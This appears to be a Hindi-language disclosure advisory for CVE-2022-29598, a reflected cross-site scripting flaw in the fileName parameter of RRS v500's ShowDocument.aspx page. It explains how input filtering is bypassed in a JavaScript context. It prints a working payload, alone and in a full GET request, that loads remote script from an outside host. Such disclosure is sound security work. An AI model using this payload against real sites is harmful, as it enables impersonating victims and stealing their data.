
RRS v500 एप्लिकेशन एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी के प्रति संवेदनशील है।
Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29598
Solutions Atlantic का RRS v500 एप्लिकेशन एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी के लिए असुरक्षित है। XSS कमजोरी का शोषण करके एक हमलावर पीड़ित उपयोगकर्ता के रूप में प्रतिरूपण कर सकता है, संवेदनशील डेटा का खुलासा कर सकता है, या ऐसे कार्य कर सकता है जो पीड़ित उपयोगकर्ता को करने की अनुमति है।
fileName पैरामीटर उपयोगकर्ता इनपुट स्वीकार करता है और सर्वर के प्रतिक्रिया में इसे प्रतिबिंबित करता है। हालांकि प्रतिबिंब से पहले कुछ उपयोगकर्ता इनपुट फ़िल्टरिंग और सैनिटाइज़ेशन किया गया था, जैसे कुछ विशेष वर्ण एन्कोडिंग (अधिक/कम चिह्न), चूंकि प्रतिबिंब जावास्क्रिप्ट संदर्भ में हुआ, जावास्क्रिप्ट कोड को सर्वर के प्रतिक्रिया में इंजेक्ट किया जा सकता था, प्रतिबंधों को दरकिनार करते हुए।
प्रभावित URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxXSS पेलोड का उपयोग:
javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//प्रभावित URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxएप्लिकेशन में बाहरी वेबसाइटों से लिंक करने की क्षमता है। बाहरी साइट के लिंक का चयन करते समय, /RRSWeb/maint/ShowDocument/ShowDocument.aspx पर दो पैरामीटर, fileName (जिसमें रीडायरेक्ट होने वाली बाहरी साइट का URL होगा) और requestType (जिसका मान ExternalLink होगा) के साथ एक अनुरोध किया जाता है। जब तक requestType पैरामीटर अपने डिफ़ॉल्ट मान पर सेट है, उपयोगकर्ता fileName पैरामीटर में जो कुछ भी डालता है, वह जावास्क्रिप्ट संदर्भ में, विशेष रूप से window.location.href के अंदर प्रतिबिंबित होगा। जावास्क्रिप्ट निर्देश के साथ XSS पेलोड का उपयोग करके, एक सफल परावर्तित XSS हमला हो सकता है।
XSS पेलोड के साथ GET अनुरोध:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0
सर्वर प्रतिक्रिया:

ब्राउज़र में प्रस्तुत:

अप्रैल 2022